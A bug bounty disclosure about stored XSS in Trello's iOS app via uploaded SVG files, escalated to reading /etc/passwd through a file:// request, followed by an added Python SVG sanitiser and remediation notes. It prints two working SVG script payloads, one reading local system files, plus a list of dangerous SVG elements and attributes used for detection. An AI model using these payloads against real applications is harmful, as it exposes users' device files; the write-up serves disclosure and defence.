Hacking Trello’s iOS App

Trello is a collaboration tool that organizes your projects into boards. In one glance, Trello tells you what’s being worked on, who’s working on what, and where something is in a process.

They launched their Bug Bounty Program on February 2nd, 2015. They pay bounties in exchange for a valid bug starting from $256 up to $4096, depending on the severity of the bug.

Summary

Trello allows its users to upload a file through their iOS application. After observing how the upload feature works, I noticed that some file types execute directly in the Trello iOS app when opened.

Proof of Concept

I created a .svg file that contains a malicious script that will execute once accessed or opened.

<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
	<svg xmlns="http://www.w3.org/2000/svg">
		<script>alert(document.location);</script>
	</svg>


I then uploaded it to Trello and upon accessing the uploaded file, it successfully executed the script.

Then I noticed that the file was not only stored in their third-party storage service but was also stored locally on the device. That reminded me that it might be possible to perform a Local File Inclusion (LFI).

Local File Inclusion (LFI) is an inclusion attack through which an attacker tricks an application into including files from the local file system by exploiting functionality that dynamically includes local files or scripts.

I created another payload inside the .svg file that will locate, read, and display the contents of the /etc/passwd file.

<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<svg xmlns="http://www.w3.org/2000/svg">
   <script>
      // Fetch a local file with a synchronous request and show its contents
      function readTextFile(file) {
         var rawFile = new XMLHttpRequest();
         rawFile.open("GET", file, false);
         rawFile.onreadystatechange = function () {
            if (rawFile.readyState === 4) {
               // file:// responses report status 0 rather than 200
               if (rawFile.status === 200 || rawFile.status == 0) {
                  var allText = rawFile.responseText;
                  alert(allText);
               }
            }
         };
         rawFile.send(null);
      }
      readTextFile("file:///../../../../../../../../../etc/passwd");
   </script>
</svg>

I uploaded the new file and the script worked upon accessing the file.
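Both payloads above work for the same reason: an uploaded SVG was rendered by a component that treats it as an active document (so `<script>` runs) and, in the second case, from a file:// origin that can read the local file system. On the server or client side, an upload pipeline can refuse or neutralise such content before it is ever rendered. The following is an added example, not Trello's code: it walks an SVG with Python's standard-library XML parser and reports or strips the things that make an SVG active, namely `<script>` and `<foreignObject>` elements, `on*` event-handler attributes, and `href`/`xlink:href` values that are not same-document fragments. The sample inputs are constructed here; the first is the alert payload from this post.

```python
"""Inspect and sanitise SVG uploads before a viewer renders them (added example)."""
import re
import xml.etree.ElementTree as ET

SVG_NS = "http://www.w3.org/2000/svg"
XLINK_NS = "http://www.w3.org/1999/xlink"

# Elements that can execute script or embed arbitrary HTML inside an SVG.
DANGEROUS_TAGS = {"script", "foreignObject"}
# Attributes that may carry a URL; only same-document fragments ("#id") are kept.
URL_ATTRS = {"href", "{%s}href" % XLINK_NS}
FRAGMENT_ONLY = re.compile(r"^\s*#")

# Constructed samples. POC_SVG is the alert payload from this post; the second
# one is made up here to show event handlers and URL attributes being handled.
POC_SVG = (
    '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
    '<svg xmlns="http://www.w3.org/2000/svg">'
    '<script>alert(document.location);</script></svg>'
)
CONSTRUCTED_SVG = (
    '<svg xmlns="http://www.w3.org/2000/svg" '
    'xmlns:xlink="http://www.w3.org/1999/xlink" onload="alert(1)">'
    '<a href="javascript:alert(1)"><circle r="5" xlink:href="#ok"/></a>'
    '<use href="#shape"/></svg>'
)


def _local(tag):
    """Strip the namespace from an ElementTree name: '{ns}script' -> 'script'."""
    return tag.rsplit("}", 1)[-1]


def _bad_attribute(attr, value):
    """True for event handlers and for URL attributes that are not fragments."""
    if _local(attr).lower().startswith("on"):
        return True
    return attr in URL_ATTRS and not FRAGMENT_ONLY.match(value)


def find_active_content(svg_text):
    """Return a list of reasons this SVG would run code or load external
    resources when rendered. An empty list means nothing was found."""
    findings = []
    for elem in ET.fromstring(svg_text).iter():
        if not isinstance(elem.tag, str):  # comments / processing instructions
            continue
        name = _local(elem.tag)
        if name in DANGEROUS_TAGS:
            findings.append("element <%s>" % name)
        for attr, value in elem.attrib.items():
            if _bad_attribute(attr, value):
                findings.append("attribute %s=%r on <%s>" % (_local(attr), value, name))
    return findings


def sanitize_svg(svg_text):
    """Return the SVG with script-bearing elements and attributes removed."""
    root = ET.fromstring(svg_text)
    # ElementTree has no parent pointers, so build the map before mutating.
    parents = {child: parent for parent in root.iter() for child in parent}
    for elem in list(root.iter()):
        if not isinstance(elem.tag, str):
            continue
        if _local(elem.tag) in DANGEROUS_TAGS and elem in parents:
            parents[elem].remove(elem)
            continue
        for attr in list(elem.attrib):
            if _bad_attribute(attr, elem.attrib[attr]):
                del elem.attrib[attr]
    ET.register_namespace("", SVG_NS)
    ET.register_namespace("xlink", XLINK_NS)
    return ET.tostring(root, encoding="unicode")


if __name__ == "__main__":
    for sample in (POC_SVG, CONSTRUCTED_SVG):
        print("findings:", find_active_content(sample))
        print("sanitised:", sanitize_svg(sample))
```

Rejecting uploads for which `find_active_content` returns anything is the simpler policy; `sanitize_svg` is for pipelines that must accept user artwork. Neither replaces the viewer-side fix: a local file should still be displayed as an inert image (or from an origin with no file system access) rather than loaded as a document.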

Remediation

Trello triaged the report and fixed it in version 4.0.8. Trello asked me to verify the fix in the app through TestFlight, and I confirmed the fix.